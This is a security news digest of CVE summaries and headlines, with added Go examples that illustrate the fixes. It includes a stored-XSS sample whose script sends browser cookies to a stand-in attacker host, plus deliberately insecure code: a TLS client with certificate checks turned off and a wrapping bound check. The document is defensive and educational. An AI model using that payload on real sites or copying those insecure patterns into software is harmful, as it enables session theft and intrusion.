🛡 Cybersecurity & Privacy 🛡 - News
🗞 The finest daily news on cybersecurity and privacy.

🔔 Daily releases.

💻 Is your online life secure?

📩 lalilolalo.dev@gmail.com
‼ CVE-2021-22377 ‼

There is a command injection vulnerability in S12700 V200R019C00SPC500, S2700 V200R019C00SPC500, S5700 V200R019C00SPC500, S6700 V200R019C00SPC500 and S7700 V200R019C00SPC500. A module does not verify specific input sufficiently. Attackers can exploit this vulnerability by sending malicious parameters to inject commands. This can compromise normal service.

📖 Read

via "National Vulnerability Database".
‼ CVE-2021-22382 ‼

Huawei LTE USB Dongle products have an improper permission assignment vulnerability. An attacker can locally access and log in to a PC to induce a user to install a specially crafted application. After successfully exploiting this vulnerability, the attacker can perform unauthenticated operations. Affected product versions include: E3372 E3372h-153TCPU-V200R002B333D01SP00C00.

📖 Read

via "National Vulnerability Database".
‼ CVE-2021-22361 ‼

There is an improper authorization vulnerability in eCNS280 V100R005C00, V100R005C10 and eSE620X vESS V100R001C10SPC200, V100R001C20SPC200. A file access is not authorized correctly. An attacker with low privileges may escalate privileges in a specific scenario. This may compromise the normal service.

📖 Read

via "National Vulnerability Database".
❌ BEC Losses Top $1.8B as Tactics Evolve ❌

BEC attacks are getting more dangerous, and smart users are the ones who can stop them.

📖 Read

via "Threat Post".
‼ CVE-2021-32699 ‼

Wings is the control plane software for the open source Pterodactyl game management system. All versions of Pterodactyl Wings prior to `1.4.4` are vulnerable to system resource exhaustion due to improper container process limits being defined. A malicious user can consume more resources than intended and cause downstream impacts to other clients on the same hardware, eventually causing the physical server to stop responding. Users should upgrade to `1.4.4` to mitigate the issue. There is no non-code based workaround for impacted versions of the software. Users running customized versions of this software can manually set a PID limit for containers created.

📖 Read

via "National Vulnerability Database".
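The missing control in the Wings advisory above is a per-container PID limit (Docker exposes it as `--pids-limit` on the CLI and `HostConfig.PidsLimit` in the Engine API; the kernel enforces it through the `pids.max` file of the container's cgroup). The following audit is an added example written for this digest, not Wings or Pterodactyl code: it walks a cgroup tree, reads every `pids.max`, and reports containers that have no limit at all. The cgroup paths in the comments and the on-disk fixture built by `newFixture` are constructed for the example.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"strconv"
	"strings"
)

// Finding is one cgroup's PID limit as read from its pids.max file.
type Finding struct {
	Path      string // cgroup directory that holds the pids.max file
	Limit     int64  // numeric limit; 0 when Unlimited is true
	Unlimited bool   // true when pids.max is "max", i.e. no limit at all
}

// parsePidsMax interprets the contents of a pids.max file. The cgroup v1 pids
// controller and the v2 unified hierarchy share the format: the literal "max"
// for no limit, otherwise a non-negative decimal integer.
func parsePidsMax(content string) (limit int64, unlimited bool, err error) {
	s := strings.TrimSpace(content)
	if s == "max" {
		return 0, true, nil
	}
	n, err := strconv.ParseInt(s, 10, 64)
	if err != nil || n < 0 {
		return 0, false, fmt.Errorf("unexpected pids.max value %q", s)
	}
	return n, false, nil
}

// auditPidLimits walks a cgroup root (for Docker typically
// /sys/fs/cgroup/pids/docker on v1 or /sys/fs/cgroup/system.slice on v2)
// and returns every pids.max it finds, in lexical path order.
func auditPidLimits(root string) ([]Finding, error) {
	var out []Finding
	err := filepath.WalkDir(root, func(p string, d fs.DirEntry, walkErr error) error {
		if walkErr != nil {
			return walkErr
		}
		if d.IsDir() || d.Name() != "pids.max" {
			return nil
		}
		b, err := os.ReadFile(p)
		if err != nil {
			return err
		}
		limit, unlimited, err := parsePidsMax(string(b))
		if err != nil {
			return fmt.Errorf("%s: %w", p, err)
		}
		out = append(out, Finding{Path: filepath.Dir(p), Limit: limit, Unlimited: unlimited})
		return nil
	})
	return out, err
}

// unlimitedContainers filters an audit down to cgroups with no PID limit,
// the condition the advisory describes.
func unlimitedContainers(all []Finding) []Finding {
	var bad []Finding
	for _, f := range all {
		if f.Unlimited {
			bad = append(bad, f)
		}
	}
	return bad
}

// newFixture writes a constructed imitation of a cgroup tree into a temp dir
// so the audit runs without root or a live Docker host. Container IDs are made up.
func newFixture() (string, error) {
	root, err := os.MkdirTemp("", "cgroup-fixture")
	if err != nil {
		return "", err
	}
	files := map[string]string{
		"docker/aaaa1111/pids.max": "max\n", // unlimited: one fork bomb can stall the host
		"docker/bbbb2222/pids.max": "512\n", // bounded
	}
	for rel, content := range files {
		full := filepath.Join(root, rel)
		if err := os.MkdirAll(filepath.Dir(full), 0o755); err != nil {
			return "", err
		}
		if err := os.WriteFile(full, []byte(content), 0o644); err != nil {
			return "", err
		}
	}
	return root, nil
}

func main() {
	root, err := newFixture()
	if err != nil {
		fmt.Println(err)
		return
	}
	defer os.RemoveAll(root)
	findings, err := auditPidLimits(root)
	if err != nil {
		fmt.Println(err)
		return
	}
	for _, f := range findings {
		if f.Unlimited {
			fmt.Printf("%s: NO PID LIMIT\n", f.Path)
		} else {
			fmt.Printf("%s: pids.max=%d\n", f.Path, f.Limit)
		}
	}
}
```

Point `auditPidLimits` at the real cgroup root on a host to use it for real; any cgroup reported by `unlimitedContainers` should be recreated with a PID limit.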
‼ CVE-2021-32700 ‼

Ballerina is an open source programming language and platform for cloud application programmers. Ballerina versions 1.2.x and SL releases up to alpha 3 have a potential for a supply chain attack via MITM against users. HTTP connections did not use TLS, and certificate checking was ignored. The vulnerability allows an attacker to substitute or modify packages retrieved from BC, thereby injecting malicious code into Ballerina executables. This has been patched in Ballerina 1.2.14 and Ballerina SwanLake alpha4.

📖 Read

via "National Vulnerability Database".
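The two defects in the Ballerina advisory (plain HTTP, and TLS without certificate verification) are the same ones any package fetcher can have. The example below is added here and is not Ballerina's code: it shows the weak client beside a verifying one, refuses non-https URLs, pins the registry certificate, and checks the downloaded body against a SHA-256 digest obtained out of band, so a substituted package is rejected even if the transport were subverted. The registry is an in-process `httptest` server with a self-signed certificate, standing in for both the genuine registry and an on-path attacker; `samplePackage` and the URL path are constructed.

```go
package main

import (
	"crypto/sha256"
	"crypto/tls"
	"crypto/x509"
	"encoding/hex"
	"errors"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/url"
	"time"
)

// samplePackage is a constructed stand-in for a package archive.
var samplePackage = []byte("// constructed sample package body\n")

// ErrPlainHTTP is returned for any package URL that is not https.
var ErrPlainHTTP = errors.New("refusing to fetch a package over plain http")

// sha256Hex returns the hex SHA-256 digest of b, the form a signed index publishes.
func sha256Hex(b []byte) string {
	sum := sha256.Sum256(b)
	return hex.EncodeToString(sum[:])
}

// insecureClient reproduces the weak behaviour the advisory describes:
// certificate verification is off, so an on-path attacker with any
// self-signed certificate is accepted as the registry.
func insecureClient() *http.Client {
	return &http.Client{Timeout: 10 * time.Second, Transport: &http.Transport{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, // the bug
	}}
}

// secureClient verifies the server certificate against roots (nil selects
// the system trust store; a pool holding only the registry CA pins it) and
// refuses anything below TLS 1.2.
func secureClient(roots *x509.CertPool) *http.Client {
	return &http.Client{Timeout: 10 * time.Second, Transport: &http.Transport{
		TLSClientConfig: &tls.Config{MinVersion: tls.VersionTLS12, RootCAs: roots},
	}}
}

// trustOnly builds a root pool containing a single certificate, for pinning.
func trustOnly(cert *x509.Certificate) *x509.CertPool {
	pool := x509.NewCertPool()
	pool.AddCert(cert)
	return pool
}

// fetchPackage downloads rawURL with c and rejects the body unless its
// SHA-256 digest equals wantSHA256, which must come from an out-of-band
// source (a signed index), never from the same connection.
func fetchPackage(c *http.Client, rawURL, wantSHA256 string) ([]byte, error) {
	u, err := url.Parse(rawURL)
	if err != nil {
		return nil, err
	}
	if u.Scheme != "https" {
		return nil, ErrPlainHTTP
	}
	resp, err := c.Get(rawURL)
	if err != nil {
		return nil, err // includes x509 verification failures
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		return nil, fmt.Errorf("unexpected status %s", resp.Status)
	}
	body, err := io.ReadAll(io.LimitReader(resp.Body, 64<<20)) // bound the download
	if err != nil {
		return nil, err
	}
	if got := sha256Hex(body); got != wantSHA256 {
		return nil, fmt.Errorf("checksum mismatch: got %s want %s", got, wantSHA256)
	}
	return body, nil
}

// newRegistry starts an HTTPS server with a self-signed certificate that
// serves body for every request.
func newRegistry(body []byte) *httptest.Server {
	return httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		_, _ = w.Write(body)
	}))
}

func main() {
	srv := newRegistry(samplePackage)
	defer srv.Close()
	want := sha256Hex(samplePackage)
	pinned := secureClient(trustOnly(srv.Certificate()))
	_, err := fetchPackage(secureClient(nil), srv.URL+"/pkg", want)
	fmt.Println("verifying client, untrusted cert:", err) // x509 error
	_, err = fetchPackage(insecureClient(), srv.URL+"/pkg", want)
	fmt.Println("InsecureSkipVerify client:", err) // <nil>: MITM accepted
	_, err = fetchPackage(pinned, srv.URL+"/pkg", want)
	fmt.Println("pinned client:", err) // <nil>
	_, err = fetchPackage(pinned, srv.URL+"/pkg", sha256Hex([]byte("tampered")))
	fmt.Println("pinned client, wrong digest:", err) // checksum mismatch
}
```

The digest check is what makes the fix robust: TLS authenticates the registry, but a compromised registry or mirror still serves whatever it likes, and only a digest from a separately trusted index catches that.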
🦿 Data resiliency is key to surviving a ransomware attack, expert says 🦿

It's not "if" but "when" you'll be attacked, cybersecurity expert says. Checking on your data and backups is something businesses should do regularly.

📖 Read

via "Tech Republic".
🦿 How to be prepared for a ransomware attack: Check your data and backups 🦿

Expert says ransomware attacks will happen, and your company has to be prepared long before the attack hits.

📖 Read

via "Tech Republic".
🕴 Despite Heightened Cyber-Risks, Few Security Leaders Report to CEO 🕴

A new report suggests that top management at most companies still don't get security.

📖 Read

via "Dark Reading".
‼ CVE-2021-34391 ‼

Trusty TLK contains a vulnerability in the NVIDIA TLK kernel's tz_handle_trusted_app_smc function where a lack of integer overflow checks on the req_off and param_ofs variables leads to memory corruption of critical kernel structures.

📖 Read

via "National Vulnerability Database".
‼ CVE-2021-34396 ‼

Bootloader contains a vulnerability in access permission settings where unauthorized software may be able to overwrite NVIDIA MB2 code, which would result in limited denial of service.

📖 Read

via "National Vulnerability Database".
‼ CVE-2021-34393 ‼

Trusty contains a vulnerability in TSEC TA which deserializes the incoming messages even though the TSEC TA does not expose any command. This vulnerability might allow an attacker to exploit the deserializer to impact code execution, causing information disclosure.

📖 Read

via "National Vulnerability Database".
‼ CVE-2021-34395 ‼

Trusty TLK contains a vulnerability in its access permission settings where it does not properly restrict access to a resource from a user with local privileges, which might lead to limited information disclosure and limited denial of service.

📖 Read

via "National Vulnerability Database".
‼ CVE-2021-34397 ‼

Bootloader contains a vulnerability in NVIDIA MB2, which may cause free-the-wrong-heap, which may lead to limited denial of service.

📖 Read

via "National Vulnerability Database".
‼ CVE-2021-34392 ‼

Trusty TLK contains a vulnerability in the NVIDIA TLK kernel where an integer overflow in the tz_map_shared_mem function can bypass boundary checks, which might lead to denial of service.

📖 Read

via "National Vulnerability Database".
‼ CVE-2021-34390 ‼

Trusty TLK contains a vulnerability in the NVIDIA TLK kernel function where a lack of checks allows the exploitation of an integer overflow on the size parameter of the tz_map_shared_mem function.

📖 Read

via "National Vulnerability Database".
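CVE-2021-34390, CVE-2021-34391 and CVE-2021-34392 above are one bug class: an offset and a size supplied by the caller are added in fixed-width arithmetic before the sum is compared with the buffer bound, so a large offset wraps the sum to a small value and the bound check passes. The example below is added here and is not TLK code; the function names (`checkRangeVulnerable`, `checkRangeSafe`, `paramSlice`) and the request buffer are constructed to show the pattern with 32-bit unsigned arithmetic, which wraps silently in Go just as it does in C.

```go
package main

import (
	"errors"
	"fmt"
	"math"
	"math/bits"
)

// ErrOutOfRange is returned when a claimed (offset, size) pair does not fit
// inside the buffer, including the case where offset+size overflows.
var ErrOutOfRange = errors.New("offset/size outside buffer")

// checkRangeVulnerable shows the bug: off+size is computed in 32 bits and
// compared afterwards, so an off close to 2^32 wraps the sum to a small
// number and the check accepts a range that lies far outside the buffer.
func checkRangeVulnerable(off, size, limit uint32) bool {
	return off+size <= limit // wraps when off+size exceeds 2^32-1
}

// checkRangeSafe takes the carry out of the addition and rejects the request
// when it is set, so the comparison only ever sees a true sum.
func checkRangeSafe(off, size, limit uint32) bool {
	end, carry := bits.Add32(off, size, 0)
	return carry == 0 && end <= limit
}

// checkRangeSafeNoCarry is the same check without a checked-add helper, in
// the form one would write in C: subtract on the side that cannot underflow.
func checkRangeSafeNoCarry(off, size, limit uint32) bool {
	return size <= limit && off <= limit-size
}

// paramSlice returns the bytes a request claims to carry at (paramOfs,
// paramLen), validated against the request length, or ErrOutOfRange. This
// models the req_off/param_ofs bound the advisory refers to.
func paramSlice(req []byte, paramOfs, paramLen uint32) ([]byte, error) {
	if len(req) > math.MaxUint32 {
		return nil, ErrOutOfRange // length would not fit the 32-bit bound
	}
	if !checkRangeSafe(paramOfs, paramLen, uint32(len(req))) {
		return nil, ErrOutOfRange
	}
	return req[paramOfs : paramOfs+paramLen], nil
}

func main() {
	const limit = 0x1000
	off, size := uint32(0xFFFFFFF0), uint32(0x20) // off+size wraps to 0x10
	fmt.Println("vulnerable check accepts:", checkRangeVulnerable(off, size, limit)) // true
	fmt.Println("safe check accepts:", checkRangeSafe(off, size, limit))             // false
	req := []byte("0123456789abcdef") // constructed request buffer
	p, err := paramSlice(req, 4, 4)
	fmt.Printf("in-range params: %q %v\n", p, err)
	_, err = paramSlice(req, 0xFFFFFFFF, 2)
	fmt.Println("wrapping params:", err)
}
```

When reviewing bound checks of this shape, look for any `a + b <= n` where `a` or `b` is attacker-controlled; the safe forms either test the carry or rearrange the comparison so that no intermediate result can wrap.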
❌ SonicWall ‘Botches’ October Patch for Critical VPN Bug ❌

Company finally rolls out the complete fix this week for an RCE flaw affecting some 800,000 devices that could result in crashes or prevent users from connecting to corporate resources.

📖 Read

via "Threat Post".
‼ CVE-2021-35210 ‼

Contao 4.5.x through 4.9.x before 4.9.16, and 4.10.x through 4.11.x before 4.11.5, allows XSS. It is possible to inject code into the tl_log table that will be executed in the browser when the system log is called in the back end.

📖 Read

via "National Vulnerability Database".
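The Contao entry above is a stored XSS: text that reaches the log table is later rendered in an administrator's browser without output encoding. The example below is an added illustration in Go, not Contao's (PHP) code: the same template is rendered once with `text/template`, which performs no escaping and emits the stored payload verbatim, and once with `html/template`, which escapes each value for its HTML context. The `logEntry` type and the `sampleLog` rows are constructed for the example.

```go
package main

import (
	"bytes"
	htmltemplate "html/template"
	"strings"
	texttemplate "text/template"
)

// logEntry models one row of a back-end system-log table. The Text column
// holds whatever a user-triggered action wrote to the log, so it is
// untrusted input when the log is rendered for an administrator.
type logEntry struct {
	ID     int
	Action string
	Text   string
}

// sampleLog is constructed. The second row carries a script that a viewer
// without output encoding hands straight to the administrator's browser.
var sampleLog = []logEntry{
	{1, "CRON", "Purged expired sessions"},
	{2, "ERROR", `Login failed for <script>fetch("https://attacker.invalid/?c="+document.cookie)</script>`},
}

// rowTmpl is the same template text for both renderers; only the engine differs.
const rowTmpl = "<tr><td>{{.ID}}</td><td>{{.Action}}</td><td>{{.Text}}</td></tr>\n"

// renderUnsafe uses text/template, which performs no output encoding, so
// stored markup is emitted verbatim. This is the vulnerable pattern.
func renderUnsafe(entries []logEntry) (string, error) {
	t, err := texttemplate.New("row").Parse(rowTmpl)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	for _, e := range entries {
		if err := t.Execute(&buf, e); err != nil {
			return "", err
		}
	}
	return buf.String(), nil
}

// renderSafe uses html/template, which escapes every interpolated value for
// the HTML context it lands in, so the same payload is shown as inert text.
func renderSafe(entries []logEntry) (string, error) {
	t, err := htmltemplate.New("row").Parse(rowTmpl)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	for _, e := range entries {
		if err := t.Execute(&buf, e); err != nil {
			return "", err
		}
	}
	return buf.String(), nil
}

// containsRawScript reports whether rendered HTML still carries an unescaped
// <script tag, a cheap regression check for a log viewer.
func containsRawScript(html string) bool {
	return strings.Contains(strings.ToLower(html), "<script")
}

func main() {
	unsafe, _ := renderUnsafe(sampleLog)
	safe, _ := renderSafe(sampleLog)
	println("text/template output carries raw <script>:", containsRawScript(unsafe)) // true
	println("html/template output carries raw <script>:", containsRawScript(safe))   // false
	print(safe)
}
```

Escaping at render time is the fix; filtering on the way into the log table is not a substitute, because the log also records failures and error text that cannot be constrained in advance.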
‼ CVE-2021-29084 ‼

Improper neutralization of special elements in output used by a downstream component ('Injection') vulnerability in Security Advisor report management component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to read arbitrary files via unspecified vectors.

📖 Read

via "National Vulnerability Database".
❌ Unpatched Linux Marketplace Bugs Allow Wormable Attacks, Drive-By RCE ❌

A pair of zero-days affecting Pling-based marketplaces could allow for some ugly attacks on unsuspecting Linux enthusiasts -- with no patches in sight.

📖 Read

via "Threat Post".
🕴 Expecting the Unexpected: Tips for Effectively Mitigating Ransomware Attacks in 2021 🕴

Cybercriminals continually innovate to thwart security protocols, but organizations can take steps to prevent and mitigate ransomware attacks.

📖 Read

via "Dark Reading".